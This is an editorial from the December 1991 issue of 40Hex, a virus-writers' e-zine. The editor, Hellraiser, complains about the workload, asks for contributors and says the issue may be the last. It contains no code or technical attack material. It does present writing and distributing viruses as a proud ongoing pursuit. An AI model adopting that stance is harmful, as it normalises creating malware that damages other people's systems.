.. <DIR> 12-10-91 8:46p
2 file(s) 0 bytes
Total files listed:
147 file(s) 2287766 bytes
1843200 bytes free
40Hex Issue 4 December 1991
Is This The End?
----------------
Well, to be honest, I'm kind of tired of writing this magazine. It's
not like I hate it or anything, it's just too much pressure for one
person to handle. Decimator helped me out a bit with a few articles
and such. But still, every time I do an issue it's me who does the
majority of the work. It seems the magazine is bigger than I
thought. It seems to be on everybody's BBS from NY to California,
from Canada to Europe. The thing is I can't write this thing by
myself anymore. I work every day from 2pm - 10pm and I will be going
back to school next semester. So I don't have time to handle all the
things I do. So in the long run the magazine suffers. Anyway,
unless people want to help out (maybe the reason is that I haven't
really asked before) lemme know. Contact me on Digital Warefare.
The number's in an article in this issue somewhere, I'm sure. Anyway,
fuck it, if people don't contribute soon this may well be the last
issue of this rag ever. So whatever happens in 1992, we shall see.
So if this is it, later people. My viruses will still be coming on
strong as always...
Later
Hellraiser 12/26/91
[ANSI logo: World Wide Virus Makers/Distributors]